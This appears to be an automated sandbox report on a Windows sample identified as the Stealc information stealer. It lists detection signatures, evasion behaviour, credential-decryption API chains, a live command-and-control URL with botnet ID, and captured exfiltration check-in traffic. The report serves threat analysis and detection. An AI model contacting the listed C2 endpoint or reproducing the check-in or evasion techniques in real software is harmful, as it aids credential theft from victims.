Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522357
MD5:0079fd2131677b1d9eab7228129b05c6
SHA1:b990a78e97be25d3296df08c7fd3c2c2491804cb
SHA256:e5d54dbfb6aa3a373538a399c8727551d092d8980fe263cccda5b4b910154a04
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0079FD2131677B1D9EAB7228129B05C6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5740JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5740JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.file.exe.a50000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T00:30:12.065256+020020442431Malware Command and Control Activity Detected192.168.2.749700185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 1.2.file.exe.a50000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 39%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,1_2_00A5C820
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A59AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00A59AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A57240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00A57240
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A59B60 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00A59B60
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A68EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00A68EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00A638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A64910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00A5DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00A5E430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00A5ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00A64570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00A63EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A5F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00A5DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00A5BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 37 35 35 39 37 32 46 38 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="hwid"B0755972F8951117388365------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="build"doma------BAFCGIJDAFBKFIECBGCA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A54880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00A54880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 37 35 35 39 37 32 46 38 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="hwid"B0755972F8951117388365------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="build"doma------BAFCGIJDAFBKFIECBGCA--
                Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
                Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
                Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
                Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
                Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/u8
                Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37s

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DB88AB1_2_00DB88AB
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D7819F1_2_00D7819F
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E049411_2_00E04941
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CF19601_2_00CF1960
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D921761_2_00D92176
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E16B3E1_2_00E16B3E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E1DB091_2_00E1DB09
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E20C631_2_00E20C63
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DC35581_2_00DC3558
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E185751_2_00E18575
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E0ED2D1_2_00E0ED2D
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E226991_2_00E22699
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E11FBE1_2_00E11FBE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DBBF4D1_2_00DBBF4D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A545C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: aabwzlbm ZLIB complexity 0.9949325273449205
                Source: file.exe, 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A68680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00A68680
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A63720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00A63720
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 39%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1864704 > 1048576
                Source: file.exeStatic PE information: Raw size of aabwzlbm is bigger than: 0x100000 < 0x1a1200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.a50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aabwzlbm:EW;cxkmbtsd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aabwzlbm:EW;cxkmbtsd:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00A69860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cf11f should be: 0x1d06b3
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: aabwzlbm
                Source: file.exeStatic PE information: section name: cxkmbtsd
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EE50CA push 62950C49h; mov dword ptr [esp], edi1_2_00EE50F2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F090C0 push ebx; mov dword ptr [esp], 2CFC6694h1_2_00F09067
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E288D3 push 1D64D53Ah; mov dword ptr [esp], esi1_2_00E28932
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E288D3 push 06744E82h; mov dword ptr [esp], ecx1_2_00E2897B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E288D3 push ecx; mov dword ptr [esp], eax1_2_00E289EC
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EE90A6 push 1EA32B71h; mov dword ptr [esp], eax1_2_00EE90C7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EE90A6 push ecx; mov dword ptr [esp], 255517EBh1_2_00EE90DE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EAC0B9 push esi; mov dword ptr [esp], eax1_2_00EAC0CA
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EAC0B9 push edx; mov dword ptr [esp], 4382B9D1h1_2_00EAC0FF
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EAC0B9 push 398F2B31h; mov dword ptr [esp], ecx1_2_00EAC175
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB08BC push 0D820FB2h; mov dword ptr [esp], ecx1_2_00EB08F7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB08BC push 7AA7114Eh; mov dword ptr [esp], ebx1_2_00EB096A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E9588B push eax; mov dword ptr [esp], ecx1_2_00E958FE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EE5889 push ebx; mov dword ptr [esp], edi1_2_00EE58AC
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DB88AB push eax; mov dword ptr [esp], 18C56015h1_2_00DB897E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DB88AB push esi; mov dword ptr [esp], eax1_2_00DB89E3
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DB88AB push edi; mov dword ptr [esp], 9521C58Bh1_2_00DB8A36
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DB88AB push 4B3D91B8h; mov dword ptr [esp], ecx1_2_00DB8A6E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DB88AB push 7A122765h; mov dword ptr [esp], ebx1_2_00DB8A98
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E2F892 push edi; mov dword ptr [esp], 57075211h1_2_00E300C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC6898 push 7AE67896h; mov dword ptr [esp], edi1_2_00EC68D2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A6B035 push ecx; ret 1_2_00A6B048
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010F01AE push edx; mov dword ptr [esp], 7565A34Bh1_2_010F01F1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_010F01AE push 5D8E4FC7h; mov dword ptr [esp], edx1_2_010F02C5
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F1405B push 6ED1F919h; mov dword ptr [esp], ebp1_2_00F1406A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EFF05D push edx; mov dword ptr [esp], edi1_2_00EFFC1F
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00ECB833 push ebp; mov dword ptr [esp], 72633DF6h1_2_00ECB863
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00F3D81A push ebx; mov dword ptr [esp], edx1_2_00F3D831
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5D9FC push ecx; mov dword ptr [esp], 2FFF5BD7h1_2_00E5DA28
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E881C9 push 6F824FABh; mov dword ptr [esp], ebp1_2_00E88208
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E881C9 push 35C83454h; mov dword ptr [esp], ebp1_2_00E8821E
                Source: file.exeStatic PE information: section name: aabwzlbm entropy: 7.952978260214906

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00A69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00A69860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-13651
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E385 second address: E2E399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F60F0BA102Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E221C8 second address: E221D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2DC5E second address: E2DC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F0BA1034h 0x00000009 popad 0x0000000a jc 00007F60F0BA1028h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E309BC second address: E30A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F0C8AB62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F60F0C8AB58h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 jmp 00007F60F0C8AB5Eh 0x0000002d or ecx, dword ptr [ebp+122D2890h] 0x00000033 push 77BECC32h 0x00000038 push ebx 0x00000039 jmp 00007F60F0C8AB61h 0x0000003e pop ebx 0x0000003f xor dword ptr [esp], 77BECCB2h 0x00000046 mov dl, 7Bh 0x00000048 push 00000003h 0x0000004a jmp 00007F60F0C8AB63h 0x0000004f push 00000000h 0x00000051 and di, 6FB6h 0x00000056 jnl 00007F60F0C8AB59h 0x0000005c push 00000003h 0x0000005e mov edi, dword ptr [ebp+122D29C8h] 0x00000064 call 00007F60F0C8AB59h 0x00000069 push ecx 0x0000006a push edi 0x0000006b push eax 0x0000006c pop eax 0x0000006d pop edi 0x0000006e pop ecx 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jp 00007F60F0C8AB56h 0x0000007a rdtsc
